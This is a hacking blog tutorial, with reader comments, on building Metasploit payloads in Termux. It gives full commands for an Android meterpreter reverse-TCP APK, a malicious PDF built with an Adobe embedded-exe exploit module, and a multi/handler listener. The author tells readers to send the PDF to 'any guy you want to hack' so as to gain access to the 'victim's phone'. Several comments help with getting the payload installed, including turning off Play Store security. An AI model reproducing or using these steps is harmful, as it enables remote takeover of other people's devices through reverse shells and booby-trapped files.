How to create Metasploit Payload in Termux? ( 2021 )

Hi, friends. Welcome back! Today we will talk about How to create Metasploit Payload in Termux, but before starting this, look at my previous post, which is about Installing the Metasploit framework in Termux.


Before getting started, you should know about the meaning of Payload.


how to create a payload in metasploit using termux

πŸ‘‰ Don't miss Read also: 

What is Payload?


The Payload is a script, code, or module used to execute an attack against a vulnerability. Metasploit features have a massive assortment of payloads designed for every kind of eventualities; however, we will discuss those payloads another day.

What are the requirements for creating a payload in Termux?


  1. Android 5.0 above

  2. Download Termux Android App from Play Store

  3. Installed Metasploit Framework in Termux.

  4. An active Internet or WiFi Connection

  5. Termux should be allowed to use External Storage ( To allow use this command once: "termux-setup-storage ")


How to Create Metasploit Payload in Termux?


Before creating a payload, go to Metasploit framework directory by typing cd < your Metasploit framework directory name > and type msfconsole. You will see a screen like this.


To Create a Payload, write the command given below.


Note: Below command is used to make a payload for LAN Network only. This Payload will not work on the Internet.


msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R > /sdcard/hackmingtest.apk


In this command -p stands for Payload, LHOST & LPORT are LocalHOST & LocalPORT respectively, and in last we have given a path of our Payload in sdcard which is named as hackmingtest.apk. 


Let me show you a screenshot of my mobile phone.



Creating a Payload in Metasploit using Termux


As you can see hackmingtest.apk file has been created. Next process I will tell you in my next post how you can use this Payload for exploitation. See this how-to hack android phone on LAN using termux. I'm creating this post for the instructional purpose solely don't misuse this.


Note: Never install the .apk extension file from Unknown sources or websites. I strictly suggest you use Google Play Store for installing any android application.


Below I am sharing the Youtube Video of How to create Metasploit Payload in Termux? You will get more clarity. Just follow the steps.



Video Credits: ANONYMOUS PH


How to create pdf payload in Termux?


1:-  Launch Metasploit Console


So first, open Termux, whether you're on android, or if you're on Laptop, open your terminal. Enter the following code to open the Metasploit Console.


msfconsole


When this kind of screen occurs in front of you, then we're fine, and maybe there's an issue with the installation of Metasploit.


msfconsole

2:- Creating the Evil PDF (Payload)


Type the commands below or copy-paste them one by one to create a PDF format.


use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs


Then you need to set up your local host. To do this, you will use your IP address to verify the type of your IP address.


ifconfig


In the latest termux session. Now go to your Metasploit console and set your localhost like this—


set LHOST 192.168.0.0


Replace the IP address defined in the above command with your IP address.


Now it's time to set up a port to join this command –


set LPORT 4444


You are free to use any port you choose, such as 4564, 8080, etc.


It's time to create the Evil PDF file. Do this by the order below –


set filename YourDocument.pdf


Here, you are free to use whatever name you wish. Just put it in front of MyDocument, but make sure to put it in.pdf at the end of your term.


The last order is now for the final development of the file. Do this by entering this order –


exploit


After a second, a message will be shown to show that your PDF file is being generated at any default location. Then copy the PDF file to the internal or external storage such as this one


mv <fille_location> <new_location>


And now you're done with the technical process of it. Send it to any guy you want to hack with. As soon as the PDF file is accessed, you'll get a Metasploit session.


3:- Exploitation


First, open your Metasploit console by typing


msfconsole


and then start writing below mentioned command –


use exploit/multi/handler/

set LHOST <your_IP>

set LPORT 4444

exploit

 

Exploitation

Note –  Make sure to enter the same IP and Port as you entered above in Step 2


It'll takes sometime, and then you'll get a meterpreter session. When this output happens, you will have access to the victim's phone.


If you like this post, please share this with your friends, and if you guys want to know more about hacking or programming kinds of stuff, E-mail me.


Subscribe to my Newsfeed to get the latest post updates.


Till Now, Good Bye and Take Care.



Post a Comment

22 Comments

  1. Im not able to creating payload help me

    ReplyDelete
    Replies
    1. From which step you are stucking and what kind of error its showing..

      Delete
    2. I also can't create .apk in sdcard. I followed the steps but cannot get the .apk. pls help

      Delete
    3. g o s e t t i n g s a p p s c l i c k t e r m u x t h e n p e r m i s s i o n a n d t u r n o n s t o r a g e

      Delete
  2. This below lines as error, i get after entering "msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R > /sdcard/hackmingtest.apk"

    ErrorπŸ‘‡
    data/data/com.termux/files/usr/lib/ruby/2.6.0/bundler/spec_set.rb:91:in `block in materialize': Could not find activesupport-4.2.11 in any of the sources (Bundler::GemNotFound)

    ReplyDelete
    Replies
    1. First uninstall your termux then install it again and repeat your code (latest Metasploit code) -& install unstable-repo and & pkg install metasploit.

      After completely installing your problem will be solved.

      Delete
  3. which ip we have to write ip4
    and i m getting error

    [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
    [-] No arch selected, selecting arch: dalvik from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 10088 bytes
    Error: No such file or directory @ rb_sysopen - /tmp/android.apk

    ReplyDelete
    Replies
    1. Use your router or phone ip then use your LHOST and LPORT

      Delete
  4. application is not installing

    ReplyDelete
    Replies
    1. Use ES EXPLORER to install apk using the option of Package installer

      Delete
    2. Turn off play store security

      Delete
  5. My payload apk not install in my or in other phone why is it ??

    ReplyDelete
    Replies
    1. Use ES EXPLORER to install apk using the option of Package installer

      Delete
  6. Apk not formed... permission denied...please help

    ReplyDelete
    Replies
    1. This comment has been removed by the author.

      Delete
    2. Use this code
      termux-setup-storage

      Then give the permission of the pop up..

      Now your all permissions are allowed.

      Delete
  7. Error: invalid payload: android

    ReplyDelete
  8. Iam not able to see that payload apk

    ReplyDelete
  9. Free internet payload ,ssh account ,working host, how to connet,new setting ,new update vpn, life time free internet coming
    ⬇️⬇️ https://youtube.com/channel/UCyYb1gDMS_P7LIB0vkAb98Q

    ReplyDelete
  10. I really like it but you may add something more that will become your this article so amazing chect out this and let me know this article:
    https://secnhack.in/multiple-ways-to-embed-a-payload-in-an-original-apk-file/

    2. can i share more idea for you if yes then share you email ID.

    ReplyDelete